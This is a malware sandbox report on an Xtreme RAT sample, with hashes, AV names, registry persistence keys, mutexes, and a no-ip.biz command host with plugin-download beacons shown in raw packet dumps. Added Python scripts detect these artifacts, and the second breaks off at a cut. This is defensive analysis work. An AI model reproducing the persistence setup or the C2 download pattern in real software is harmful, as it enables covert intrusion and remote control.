Analysis Date: 2013-12-16 01:17:54
MD5: ba1eaa4ea977517dcdaefd3927f292ff
SHA1: d5c732cf5c4034e8b719a2beab162f34a98547f2

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section UPX0 md5: d41d8cd98f00b204e9800998ecf8427e sha1: da39a3ee5e6b4b0d3255bfef95601890afd80709 size: 0
Section UPX1 md5: cbd8324b7ee5a8b5e2f6d4e496c0a09c sha1: 455e709e6a769bf320f1daa85d506d533804ce19 size: 19456
Section .rsrc md5: 76aafabe1c912aea6e6cbe39186e3abd sha1: 7a6045d3f24c4da500b9efa5020422813be69b4c size: 1024
Timestamp: 1992-06-19 22:22:17 (the fixed link timestamp written by the Borland Delphi linker, not a real build date; the DVCLAL and PACKAGEINFO strings below also point to a Delphi binary)
Packer: UPX -> www.upx.sourceforge.net
PEhash: 3834a9308b0bc91b8df0eaf17ba7f45d98d5ed2d
AV clamav: WIN.Trojan.Xtreme
AV avira: TR/Downloader.Gen
AV avg: Cryptic.CWS
AV msse: Backdoor:Win32/Xtrat.A
AV mcafee: BackDoor-FAJ

Runtime Details:

Screenshot: (image not included in this extract)

Process
↳ C:\malware.exe

Registry: HKEY_LOCAL_MACHINE\Software\Microsoft\Active Setup\Installed Components\{J7415I86-20E5-T71J-W13A-27B3377SB565}\StubPath ➝
C:\WINDOWS\system32\InstallDir\Server.exe restart
Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\HKCU ➝
C:\WINDOWS\system32\InstallDir\Server.exe
Registry: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\HKLM ➝
C:\WINDOWS\system32\InstallDir\Server.exe
Registry: HKEY_CURRENT_USER\SOFTWARE\5mMGC\ServerStarted ➝
12/16/2013 0:18:28 AM
Creates File: C:\WINDOWS\system32\InstallDir\Server.exe
Creates File: C:\Documents and Settings\Administrator\Application Data\Microsoft\Windows\5mMGC.cfg
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temp\x.html
Deletes File: C:\Documents and Settings\Administrator\Local Settings\Temp\x.html
Creates Process: C:\Program Files\Internet Explorer\iexplore.exe
Creates Process: C:\Program Files\Internet Explorer\iexplore.exe
Creates Process: svchost.exe
Creates Process: C:\Program Files\Internet Explorer\iexplore.exe
Creates Mutex: 5mMGCPERSIST
Creates Mutex: XTREMEUPDATE
Creates Mutex: 5mMGC

Process
↳ C:\Program Files\Internet Explorer\iexplore.exe

Creates Mutex: 5mMGC

Process
↳ C:\Program Files\Internet Explorer\iexplore.exe

Creates Mutex: 5mMGC

Process
↳ C:\Program Files\Internet Explorer\iexplore.exe

Registry: HKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝
NULL
Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass ➝
1
Creates File: C:\Documents and Settings\Administrator\Application Data\Microsoft\Windows\5mMGC.dat
Creates File: C:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates File: C:\Documents and Settings\Administrator\Cookies\index.dat
Creates File: PIPE\lsarpc
Creates File: \Device\Afd\Endpoint
Creates File: \Device\Afd\AsyncConnectHlp
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates Mutex: c:!documents and settings!administrator!local settings!history!history.ie5!
Creates Mutex: WininetConnectionMutex
Creates Mutex: c:!documents and settings!administrator!cookies!
Creates Mutex: c:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Creates Mutex: 5mMGC
Winsock DNS: brendo8222.no-ip.biz
Winsock DNS: www.webserver.com

Process
↳ svchost.exe

Registry: HKEY_LOCAL_MACHINE\Software\Microsoft\Active Setup\Installed Components\{J7415I86-20E5-T71J-W13A-27B3377SB565}\StubPath ➝
C:\WINDOWS\system32\InstallDir\Server.exe restart
Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\HKCU ➝
C:\WINDOWS\system32\InstallDir\Server.exe
Registry: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\HKLM ➝
C:\WINDOWS\system32\InstallDir\Server.exe
Creates Process: C:\WINDOWS\system32\InstallDir\Server.exe
Creates Process: C:\WINDOWS\system32\InstallDir\Server.exe
Creates Mutex: 5mMGCPERSIST
Creates Mutex: 5mMGC
Creates Mutex: 5mMGCEXIT

Process
↳ C:\WINDOWS\system32\InstallDir\Server.exe

Creates File: C:\Documents and Settings\Administrator\Application Data\Microsoft\Windows\5mMGC.cfg
Deletes File: C:\Documents and Settings\Administrator\Application Data\Microsoft\Windows\5mMGC.cfg
Creates Mutex: XTREMEUPDATE
Creates Mutex: 5mMGC

Process
↳ C:\WINDOWS\system32\InstallDir\Server.exe

Creates File: C:\Documents and Settings\Administrator\Application Data\Microsoft\Windows\5mMGC.cfg
Deletes File: C:\Documents and Settings\Administrator\Application Data\Microsoft\Windows\5mMGC.cfg
Creates Mutex: XTREMEUPDATE
Creates Mutex: 5mMGC
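The runtime events above show three autostart locations all pointing at the dropped Server.exe (an Active Setup StubPath plus Run values in both HKCU and HKLM), and the Active Setup component name is not a valid GUID: J, T, W and S are not hex digits. The script below, added here as an example and not part of the sandbox report or its tooling, runs those checks over event tuples constructed from this report. The event layout and the finding names are this example's own assumptions.

```python
"""Flag persistence and RAT-style artifacts in sandbox runtime events (added example)."""
import re

# Constructed from the report's Runtime Details: (event kind, key/path/name, value or None).
EVENTS = [
    ("Registry",
     r"HKEY_LOCAL_MACHINE\Software\Microsoft\Active Setup\Installed Components"
     r"\{J7415I86-20E5-T71J-W13A-27B3377SB565}\StubPath",
     r"C:\WINDOWS\system32\InstallDir\Server.exe restart"),
    ("Registry", r"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\HKCU",
     r"C:\WINDOWS\system32\InstallDir\Server.exe"),
    ("Registry", r"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\HKLM",
     r"C:\WINDOWS\system32\InstallDir\Server.exe"),
    ("Registry", r"HKEY_CURRENT_USER\SOFTWARE\5mMGC\ServerStarted", "12/16/2013 0:18:28 AM"),
    ("Creates File", r"C:\WINDOWS\system32\InstallDir\Server.exe", None),
    ("Creates File",
     r"C:\Documents and Settings\Administrator\Application Data\Microsoft\Windows\5mMGC.cfg", None),
    ("Creates Mutex", "5mMGCPERSIST", None),
    ("Creates Mutex", "XTREMEUPDATE", None),
    ("Creates Mutex", "5mMGC", None),
]

# A real Active Setup component name is a GUID: hex digits only, 8-4-4-4-12.
GUID_RE = re.compile(r"^\{[0-9A-F]{8}(-[0-9A-F]{4}){3}-[0-9A-F]{12}\}$", re.I)
ACTIVE_SETUP_RE = re.compile(r"\\Active Setup\\Installed Components\\(\{[^}]*\})\\StubPath$", re.I)
RUN_KEY_RE = re.compile(
    r"^(HKEY_[A-Z_]+)\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\([^\\]+)$", re.I)


def first_exe(value):
    """Executable path from a StubPath/Run value, dropping arguments such as 'restart'."""
    m = re.match(r'\s*"?(.+?\.exe)"?(\s|$)', value, re.I)
    return (m.group(1) if m else value).lower()


def persistence_locations(events):
    """Map each persisted executable (lower-cased) to the autostart locations that launch it."""
    persisted = {}
    for kind, key, value in events:
        if kind != "Registry" or not value:
            continue
        m = ACTIVE_SETUP_RE.search(key)
        if m:
            persisted.setdefault(first_exe(value), []).append("ActiveSetup:" + m.group(1))
        m = RUN_KEY_RE.match(key)
        if m:
            persisted.setdefault(first_exe(value), []).append(f"Run:{m.group(1)}:{m.group(2)}")
    return persisted


def analyze(events):
    """Return (finding, detail...) tuples. The heuristics are this example's own."""
    findings = []
    for kind, key, value in events:
        if kind == "Registry":
            m = ACTIVE_SETUP_RE.search(key)
            if m and not GUID_RE.match(m.group(1)):
                findings.append(("malformed_active_setup_guid", m.group(1)))
        elif kind == "Creates Mutex" and key.upper().startswith("XTREME"):
            findings.append(("xtreme_mutex", key))
    # A file the sample itself dropped, launched from two or more autostart locations.
    created = {key.lower() for kind, key, _ in events if kind == "Creates File"}
    for exe, locs in persistence_locations(events).items():
        if exe in created and len(locs) >= 2:
            findings.append(("dropped_and_persisted", exe, tuple(sorted(locs))))
    return findings


if __name__ == "__main__":
    for finding in analyze(EVENTS):
        print(finding)
```

The GUID check is the cheapest of the three: legitimate Active Setup components are registered by installers with well-formed GUIDs, so a StubPath under a component name containing non-hex characters is worth an alert on its own, before any hash or mutex match.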

Network Details:

DNS: www.webserver.com
Type: A
82.98.86.174
DNS: brendo8222.no-ip.biz
Type: A
8.23.224.90
HTTP GET: http://www.webserver.com/plugin.xtr
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GET: http://brendo8222.no-ip.biz/1230.functions
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GET: http://www.webserver.com/plugin.xtr
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GET: http://brendo8222.no-ip.biz:81/1230.functions
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GET: http://www.webserver.com/plugin.xtr
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GET: http://brendo8222.no-ip.biz:82/1230.functions
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GET: http://www.webserver.com/plugin.xtr
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GET: http://brendo8222.no-ip.biz:8080/1230.functions
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GET: http://www.webserver.com/plugin.xtr
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GET: http://brendo8222.no-ip.biz:2185/1230.functions
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
Flows TCP: 192.168.1.1:1032 ➝ 82.98.86.174:80
Flows TCP: 192.168.1.1:1033 ➝ 8.23.224.90:80
Flows TCP: 192.168.1.1:1034 ➝ 82.98.86.174:80
Flows TCP: 192.168.1.1:1035 ➝ 8.23.224.90:81
Flows TCP: 192.168.1.1:1036 ➝ 82.98.86.174:80
Flows TCP: 192.168.1.1:1037 ➝ 8.23.224.90:82
Flows TCP: 192.168.1.1:1038 ➝ 82.98.86.174:80
Flows TCP: 192.168.1.1:1039 ➝ 8.23.224.90:8080
Flows TCP: 192.168.1.1:1040 ➝ 82.98.86.174:80
Flows TCP: 192.168.1.1:1041 ➝ 8.23.224.90:2185

Raw Pcap
0x00000000 (00000)   47455420 2f706c75 67696e2e 78747220   GET /plugin.xtr 
0x00000010 (00016)   48545450 2f312e31 0d0a4163 63657074   HTTP/1.1..Accept
0x00000020 (00032)   3a202a2f 2a0d0a41 63636570 742d456e   : */*..Accept-En
0x00000030 (00048)   636f6469 6e673a20 677a6970 2c206465   coding: gzip, de
0x00000040 (00064)   666c6174 650d0a55 7365722d 4167656e   flate..User-Agen
0x00000050 (00080)   743a204d 6f7a696c 6c612f34 2e302028   t: Mozilla/4.0 (
0x00000060 (00096)   636f6d70 61746962 6c653b20 4d534945   compatible; MSIE
0x00000070 (00112)   20362e30 3b205769 6e646f77 73204e54    6.0; Windows NT
0x00000080 (00128)   20352e31 3b205356 313b202e 4e455420    5.1; SV1; .NET 
0x00000090 (00144)   434c5220 322e302e 35303732 37290d0a   CLR 2.0.50727)..
0x000000a0 (00160)   486f7374 3a207777 772e7765 62736572   Host: www.webser
0x000000b0 (00176)   7665722e 636f6d0d 0a436f6e 6e656374   ver.com..Connect
0x000000c0 (00192)   696f6e3a 204b6565 702d416c 6976650d   ion: Keep-Alive.
0x000000d0 (00208)   0a0d0a                                ...

0x00000000 (00000)   47455420 2f313233 302e6675 6e637469   GET /1230.functi
0x00000010 (00016)   6f6e7320 48545450 2f312e31 0d0a4163   ons HTTP/1.1..Ac
0x00000020 (00032)   63657074 3a202a2f 2a0d0a41 63636570   cept: */*..Accep
0x00000030 (00048)   742d456e 636f6469 6e673a20 677a6970   t-Encoding: gzip
0x00000040 (00064)   2c206465 666c6174 650d0a55 7365722d   , deflate..User-
0x00000050 (00080)   4167656e 743a204d 6f7a696c 6c612f34   Agent: Mozilla/4
0x00000060 (00096)   2e302028 636f6d70 61746962 6c653b20   .0 (compatible; 
0x00000070 (00112)   4d534945 20362e30 3b205769 6e646f77   MSIE 6.0; Window
0x00000080 (00128)   73204e54 20352e31 3b205356 313b202e   s NT 5.1; SV1; .
0x00000090 (00144)   4e455420 434c5220 322e302e 35303732   NET CLR 2.0.5072
0x000000a0 (00160)   37290d0a 486f7374 3a206272 656e646f   7)..Host: brendo
0x000000b0 (00176)   38323232 2e6e6f2d 69702e62 697a0d0a   8222.no-ip.biz..
0x000000c0 (00192)   436f6e6e 65637469 6f6e3a20 4b656570   Connection: Keep
0x000000d0 (00208)   2d416c69 76650d0a 0d0a                -Alive....

0x00000000 (00000)   47455420 2f706c75 67696e2e 78747220   GET /plugin.xtr 
0x00000010 (00016)   48545450 2f312e31 0d0a4163 63657074   HTTP/1.1..Accept
0x00000020 (00032)   3a202a2f 2a0d0a41 63636570 742d456e   : */*..Accept-En
0x00000030 (00048)   636f6469 6e673a20 677a6970 2c206465   coding: gzip, de
0x00000040 (00064)   666c6174 650d0a55 7365722d 4167656e   flate..User-Agen
0x00000050 (00080)   743a204d 6f7a696c 6c612f34 2e302028   t: Mozilla/4.0 (
0x00000060 (00096)   636f6d70 61746962 6c653b20 4d534945   compatible; MSIE
0x00000070 (00112)   20362e30 3b205769 6e646f77 73204e54    6.0; Windows NT
0x00000080 (00128)   20352e31 3b205356 313b202e 4e455420    5.1; SV1; .NET 
0x00000090 (00144)   434c5220 322e302e 35303732 37290d0a   CLR 2.0.50727)..
0x000000a0 (00160)   486f7374 3a207777 772e7765 62736572   Host: www.webser
0x000000b0 (00176)   7665722e 636f6d0d 0a436f6e 6e656374   ver.com..Connect
0x000000c0 (00192)   696f6e3a 204b6565 702d416c 6976650d   ion: Keep-Alive.
0x000000d0 (00208)   0a0d0a69 76650d0a 0d0a                ...ive....

0x00000000 (00000)   47455420 2f313233 302e6675 6e637469   GET /1230.functi
0x00000010 (00016)   6f6e7320 48545450 2f312e31 0d0a4163   ons HTTP/1.1..Ac
0x00000020 (00032)   63657074 3a202a2f 2a0d0a41 63636570   cept: */*..Accep
0x00000030 (00048)   742d456e 636f6469 6e673a20 677a6970   t-Encoding: gzip
0x00000040 (00064)   2c206465 666c6174 650d0a55 7365722d   , deflate..User-
0x00000050 (00080)   4167656e 743a204d 6f7a696c 6c612f34   Agent: Mozilla/4
0x00000060 (00096)   2e302028 636f6d70 61746962 6c653b20   .0 (compatible; 
0x00000070 (00112)   4d534945 20362e30 3b205769 6e646f77   MSIE 6.0; Window
0x00000080 (00128)   73204e54 20352e31 3b205356 313b202e   s NT 5.1; SV1; .
0x00000090 (00144)   4e455420 434c5220 322e302e 35303732   NET CLR 2.0.5072
0x000000a0 (00160)   37290d0a 486f7374 3a206272 656e646f   7)..Host: brendo
0x000000b0 (00176)   38323232 2e6e6f2d 69702e62 697a3a38   8222.no-ip.biz:8
0x000000c0 (00192)   310d0a43 6f6e6e65 6374696f 6e3a204b   1..Connection: K
0x000000d0 (00208)   6565702d 416c6976 650d0a0d 0a68313e   eep-Alive....h1>
0x000000e0 (00224)   0a202020 203c703e 596f7572 2062726f   .    <p>Your bro
0x000000f0 (00240)   77736572 2073656e 74206120 72657175   wser sent a requ
0x00000100 (00256)   65737420 74686174 20746869 73207365   est that this se
0x00000110 (00272)   72766572 20636f75 6c64206e 6f742075   rver could not u
0x00000120 (00288)   6e646572 7374616e 642e3c2f 703e0a20   nderstand.</p>. 
0x00000130 (00304)   2020203c 703e4e6f 20737563 68206669      <p>No such fi
0x00000140 (00320)   6c65206f 72206469 72656374 6f72792e   le or directory.
0x00000150 (00336)   3c2f703e 0a20203c 6872202f 3e0a2020   </p>.  <hr />.  
0x00000160 (00352)   3c616464 72657373 3e4d6963 726f736f   <address>Microso
0x00000170 (00368)   66742d49 49532f37 2e303c2f 61646472   ft-IIS/7.0</addr
0x00000180 (00384)   6573733e 0a20203c 2f626f64 793e0a3c   ess>.  </body>.<
0x00000190 (00400)   2f68746d 6c3e0a                       /html>.

0x00000000 (00000)   47455420 2f706c75 67696e2e 78747220   GET /plugin.xtr 
0x00000010 (00016)   48545450 2f312e31 0d0a4163 63657074   HTTP/1.1..Accept
0x00000020 (00032)   3a202a2f 2a0d0a41 63636570 742d456e   : */*..Accept-En
0x00000030 (00048)   636f6469 6e673a20 677a6970 2c206465   coding: gzip, de
0x00000040 (00064)   666c6174 650d0a55 7365722d 4167656e   flate..User-Agen
0x00000050 (00080)   743a204d 6f7a696c 6c612f34 2e302028   t: Mozilla/4.0 (
0x00000060 (00096)   636f6d70 61746962 6c653b20 4d534945   compatible; MSIE
0x00000070 (00112)   20362e30 3b205769 6e646f77 73204e54    6.0; Windows NT
0x00000080 (00128)   20352e31 3b205356 313b202e 4e455420    5.1; SV1; .NET 
0x00000090 (00144)   434c5220 322e302e 35303732 37290d0a   CLR 2.0.50727)..
0x000000a0 (00160)   486f7374 3a207777 772e7765 62736572   Host: www.webser
0x000000b0 (00176)   7665722e 636f6d0d 0a436f6e 6e656374   ver.com..Connect
0x000000c0 (00192)   696f6e3a 204b6565 702d416c 6976650d   ion: Keep-Alive.
0x000000d0 (00208)   0a0d0a                                ...

0x00000000 (00000)   47455420 2f313233 302e6675 6e637469   GET /1230.functi
0x00000010 (00016)   6f6e7320 48545450 2f312e31 0d0a4163   ons HTTP/1.1..Ac
0x00000020 (00032)   63657074 3a202a2f 2a0d0a41 63636570   cept: */*..Accep
0x00000030 (00048)   742d456e 636f6469 6e673a20 677a6970   t-Encoding: gzip
0x00000040 (00064)   2c206465 666c6174 650d0a55 7365722d   , deflate..User-
0x00000050 (00080)   4167656e 743a204d 6f7a696c 6c612f34   Agent: Mozilla/4
0x00000060 (00096)   2e302028 636f6d70 61746962 6c653b20   .0 (compatible; 
0x00000070 (00112)   4d534945 20362e30 3b205769 6e646f77   MSIE 6.0; Window
0x00000080 (00128)   73204e54 20352e31 3b205356 313b202e   s NT 5.1; SV1; .
0x00000090 (00144)   4e455420 434c5220 322e302e 35303732   NET CLR 2.0.5072
0x000000a0 (00160)   37290d0a 486f7374 3a206272 656e646f   7)..Host: brendo
0x000000b0 (00176)   38323232 2e6e6f2d 69702e62 697a3a38   8222.no-ip.biz:8
0x000000c0 (00192)   320d0a43 6f6e6e65 6374696f 6e3a204b   2..Connection: K
0x000000d0 (00208)   6565702d 416c6976 650d0a0d 0a         eep-Alive....

0x00000000 (00000)   47455420 2f706c75 67696e2e 78747220   GET /plugin.xtr 
0x00000010 (00016)   48545450 2f312e31 0d0a4163 63657074   HTTP/1.1..Accept
0x00000020 (00032)   3a202a2f 2a0d0a41 63636570 742d456e   : */*..Accept-En
0x00000030 (00048)   636f6469 6e673a20 677a6970 2c206465   coding: gzip, de
0x00000040 (00064)   666c6174 650d0a55 7365722d 4167656e   flate..User-Agen
0x00000050 (00080)   743a204d 6f7a696c 6c612f34 2e302028   t: Mozilla/4.0 (
0x00000060 (00096)   636f6d70 61746962 6c653b20 4d534945   compatible; MSIE
0x00000070 (00112)   20362e30 3b205769 6e646f77 73204e54    6.0; Windows NT
0x00000080 (00128)   20352e31 3b205356 313b202e 4e455420    5.1; SV1; .NET 
0x00000090 (00144)   434c5220 322e302e 35303732 37290d0a   CLR 2.0.50727)..
0x000000a0 (00160)   486f7374 3a207777 772e7765 62736572   Host: www.webser
0x000000b0 (00176)   7665722e 636f6d0d 0a436f6e 6e656374   ver.com..Connect
0x000000c0 (00192)   696f6e3a 204b6565 702d416c 6976650d   ion: Keep-Alive.
0x000000d0 (00208)   0a0d0a2d 416c6976 650d0a0d 0a         ...-Alive....

0x00000000 (00000)   47455420 2f313233 302e6675 6e637469   GET /1230.functi
0x00000010 (00016)   6f6e7320 48545450 2f312e31 0d0a4163   ons HTTP/1.1..Ac
0x00000020 (00032)   63657074 3a202a2f 2a0d0a41 63636570   cept: */*..Accep
0x00000030 (00048)   742d456e 636f6469 6e673a20 677a6970   t-Encoding: gzip
0x00000040 (00064)   2c206465 666c6174 650d0a55 7365722d   , deflate..User-
0x00000050 (00080)   4167656e 743a204d 6f7a696c 6c612f34   Agent: Mozilla/4
0x00000060 (00096)   2e302028 636f6d70 61746962 6c653b20   .0 (compatible; 
0x00000070 (00112)   4d534945 20362e30 3b205769 6e646f77   MSIE 6.0; Window
0x00000080 (00128)   73204e54 20352e31 3b205356 313b202e   s NT 5.1; SV1; .
0x00000090 (00144)   4e455420 434c5220 322e302e 35303732   NET CLR 2.0.5072
0x000000a0 (00160)   37290d0a 486f7374 3a206272 656e646f   7)..Host: brendo
0x000000b0 (00176)   38323232 2e6e6f2d 69702e62 697a3a38   8222.no-ip.biz:8
0x000000c0 (00192)   3038300d 0a436f6e 6e656374 696f6e3a   080..Connection:
0x000000d0 (00208)   204b6565 702d416c 6976650d 0a0d0a3e    Keep-Alive....>
0x000000e0 (00224)   0a202020 203c703e 596f7572 2062726f   .    <p>Your bro
0x000000f0 (00240)   77736572 2073656e 74206120 72657175   wser sent a requ
0x00000100 (00256)   65737420 74686174 20746869 73207365   est that this se
0x00000110 (00272)   72766572 20636f75 6c64206e 6f742075   rver could not u
0x00000120 (00288)   6e646572 7374616e 642e3c2f 703e0a20   nderstand.</p>. 
0x00000130 (00304)   2020203c 703e4e6f 20737563 68206669      <p>No such fi
0x00000140 (00320)   6c65206f 72206469 72656374 6f72792e   le or directory.
0x00000150 (00336)   3c2f703e 0a20203c 6872202f 3e0a2020   </p>.  <hr />.  
0x00000160 (00352)   3c616464 72657373 3e4d6963 726f736f   <address>Microso
0x00000170 (00368)   66742d49 49532f37 2e303c2f 61646472   ft-IIS/7.0</addr
0x00000180 (00384)   6573733e 0a20203c 2f626f64 793e0a3c   ess>.  </body>.<
0x00000190 (00400)   2f68746d 6c3e0a                       /html>.

0x00000000 (00000)   47455420 2f706c75 67696e2e 78747220   GET /plugin.xtr 
0x00000010 (00016)   48545450 2f312e31 0d0a4163 63657074   HTTP/1.1..Accept
0x00000020 (00032)   3a202a2f 2a0d0a41 63636570 742d456e   : */*..Accept-En
0x00000030 (00048)   636f6469 6e673a20 677a6970 2c206465   coding: gzip, de
0x00000040 (00064)   666c6174 650d0a55 7365722d 4167656e   flate..User-Agen
0x00000050 (00080)   743a204d 6f7a696c 6c612f34 2e302028   t: Mozilla/4.0 (
0x00000060 (00096)   636f6d70 61746962 6c653b20 4d534945   compatible; MSIE
0x00000070 (00112)   20362e30 3b205769 6e646f77 73204e54    6.0; Windows NT
0x00000080 (00128)   20352e31 3b205356 313b202e 4e455420    5.1; SV1; .NET 
0x00000090 (00144)   434c5220 322e302e 35303732 37290d0a   CLR 2.0.50727)..
0x000000a0 (00160)   486f7374 3a207777 772e7765 62736572   Host: www.webser
0x000000b0 (00176)   7665722e 636f6d0d 0a436f6e 6e656374   ver.com..Connect
0x000000c0 (00192)   696f6e3a 204b6565 702d416c 6976650d   ion: Keep-Alive.
0x000000d0 (00208)   0a0d0a                                ...

0x00000000 (00000)   47455420 2f313233 302e6675 6e637469   GET /1230.functi
0x00000010 (00016)   6f6e7320 48545450 2f312e31 0d0a4163   ons HTTP/1.1..Ac
0x00000020 (00032)   63657074 3a202a2f 2a0d0a41 63636570   cept: */*..Accep
0x00000030 (00048)   742d456e 636f6469 6e673a20 677a6970   t-Encoding: gzip
0x00000040 (00064)   2c206465 666c6174 650d0a55 7365722d   , deflate..User-
0x00000050 (00080)   4167656e 743a204d 6f7a696c 6c612f34   Agent: Mozilla/4
0x00000060 (00096)   2e302028 636f6d70 61746962 6c653b20   .0 (compatible; 
0x00000070 (00112)   4d534945 20362e30 3b205769 6e646f77   MSIE 6.0; Window
0x00000080 (00128)   73204e54 20352e31 3b205356 313b202e   s NT 5.1; SV1; .
0x00000090 (00144)   4e455420 434c5220 322e302e 35303732   NET CLR 2.0.5072
0x000000a0 (00160)   37290d0a 486f7374 3a206272 656e646f   7)..Host: brendo
0x000000b0 (00176)   38323232 2e6e6f2d 69702e62 697a3a32   8222.no-ip.biz:2
0x000000c0 (00192)   3138350d 0a436f6e 6e656374 696f6e3a   185..Connection:
0x000000d0 (00208)   204b6565 702d416c 6976650d 0a0d0a      Keep-Alive....

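The dumps above alternate between a GET for /plugin.xtr on www.webserver.com and a GET for /1230.functions on brendo8222.no-ip.biz, the latter walking through ports 80, 81, 82, 8080 and 2185. Two of the no-ip dumps (ports 81 and 8080) also carry the tail of an IIS error page straight after the request's blank line, which is leftover buffer, not part of the request. The script below, added as an example and not part of the report or any sandbox tool, reassembles one of these "offset (decimal) hex-groups ascii" dumps into bytes, parses the HTTP request out of it, and separates that trailing data; the dump embedded is a copy of the report's port-81 capture, and the indicator names are this example's own.

```python
"""Reassemble a sandbox 'Raw Pcap' hexdump and pull out the HTTP request (added example)."""
import re

# Copied from the report: the request to brendo8222.no-ip.biz:81 with response residue after it.
DUMP_PORT81 = """\
0x00000000 (00000)   47455420 2f313233 302e6675 6e637469   GET /1230.functi
0x00000010 (00016)   6f6e7320 48545450 2f312e31 0d0a4163   ons HTTP/1.1..Ac
0x00000020 (00032)   63657074 3a202a2f 2a0d0a41 63636570   cept: */*..Accep
0x00000030 (00048)   742d456e 636f6469 6e673a20 677a6970   t-Encoding: gzip
0x00000040 (00064)   2c206465 666c6174 650d0a55 7365722d   , deflate..User-
0x00000050 (00080)   4167656e 743a204d 6f7a696c 6c612f34   Agent: Mozilla/4
0x00000060 (00096)   2e302028 636f6d70 61746962 6c653b20   .0 (compatible; 
0x00000070 (00112)   4d534945 20362e30 3b205769 6e646f77   MSIE 6.0; Window
0x00000080 (00128)   73204e54 20352e31 3b205356 313b202e   s NT 5.1; SV1; .
0x00000090 (00144)   4e455420 434c5220 322e302e 35303732   NET CLR 2.0.5072
0x000000a0 (00160)   37290d0a 486f7374 3a206272 656e646f   7)..Host: brendo
0x000000b0 (00176)   38323232 2e6e6f2d 69702e62 697a3a38   8222.no-ip.biz:8
0x000000c0 (00192)   310d0a43 6f6e6e65 6374696f 6e3a204b   1..Connection: K
0x000000d0 (00208)   6565702d 416c6976 650d0a0d 0a68313e   eep-Alive....h1>
0x000000e0 (00224)   0a202020 203c703e 596f7572 2062726f   .    <p>Your bro
0x000000f0 (00240)   77736572 2073656e 74206120 72657175   wser sent a requ
0x00000100 (00256)   65737420 74686174 20746869 73207365   est that this se
0x00000110 (00272)   72766572 20636f75 6c64206e 6f742075   rver could not u
0x00000120 (00288)   6e646572 7374616e 642e3c2f 703e0a20   nderstand.</p>. 
0x00000130 (00304)   2020203c 703e4e6f 20737563 68206669      <p>No such fi
0x00000140 (00320)   6c65206f 72206469 72656374 6f72792e   le or directory.
0x00000150 (00336)   3c2f703e 0a20203c 6872202f 3e0a2020   </p>.  <hr />.  
0x00000160 (00352)   3c616464 72657373 3e4d6963 726f736f   <address>Microso
0x00000170 (00368)   66742d49 49532f37 2e303c2f 61646472   ft-IIS/7.0</addr
0x00000180 (00384)   6573733e 0a20203c 2f626f64 793e0a3c   ess>.  </body>.<
0x00000190 (00400)   2f68746d 6c3e0a                       /html>.
"""

HEX_TOKEN = re.compile(r"^[0-9a-fA-F]{2,8}$")
DUMP_LINE = re.compile(r"^0x([0-9a-fA-F]+)\s+\(\d+\)\s+(.*)$")
XTREME_PATH = re.compile(r"^/(plugin\.xtr|\d+\.functions)$")  # the two paths seen in this report


def hexdump_to_bytes(dump):
    """Decode the hex groups of each line (at most 16 bytes per line), ignoring the ASCII
    column; the offset column is checked against the bytes decoded so far, so a dropped
    or misread line raises instead of silently shifting every later byte."""
    out = bytearray()
    for line in dump.splitlines():
        m = DUMP_LINE.match(line)
        if not m:
            continue
        if int(m.group(1), 16) != len(out):
            raise ValueError(f"offset mismatch at {line[:18]!r}")
        n = 0
        for tok in m.group(2).split():
            if n >= 16 or len(tok) % 2 or not HEX_TOKEN.match(tok):
                break  # reached the ASCII column
            out += bytes.fromhex(tok)
            n += len(tok) // 2
    return bytes(out)


def parse_http_request(raw):
    """Split at the first CRLFCRLF; bytes after it are returned as 'trailing', not parsed."""
    head, sep, trailing = raw.partition(b"\r\n\r\n")
    if not sep:
        raise ValueError("no end of headers in captured data")
    lines = head.decode("latin-1").split("\r\n")
    method, path, version = lines[0].split(" ", 2)
    headers = {}
    for h in lines[1:]:
        k, _, v = h.partition(":")
        headers[k.strip().lower()] = v.strip()
    host, _, port = headers.get("host", "").partition(":")
    return {"method": method, "path": path, "version": version,
            "host": host, "port": int(port) if port else 80,
            "user_agent": headers.get("user-agent", ""), "trailing": trailing}


def xtreme_indicators(req):
    """Traits shared by the beacons in this report (heuristic; this example's own names)."""
    hits = []
    if XTREME_PATH.match(req["path"]):
        hits.append("xtreme_path")
    if req["port"] not in (80, 443):
        hits.append("http_on_nonstandard_port")
    if req["host"].lower().endswith(".no-ip.biz"):
        hits.append("dynamic_dns_host")
    if req["trailing"]:
        hits.append("trailing_bytes")
    return hits


if __name__ == "__main__":
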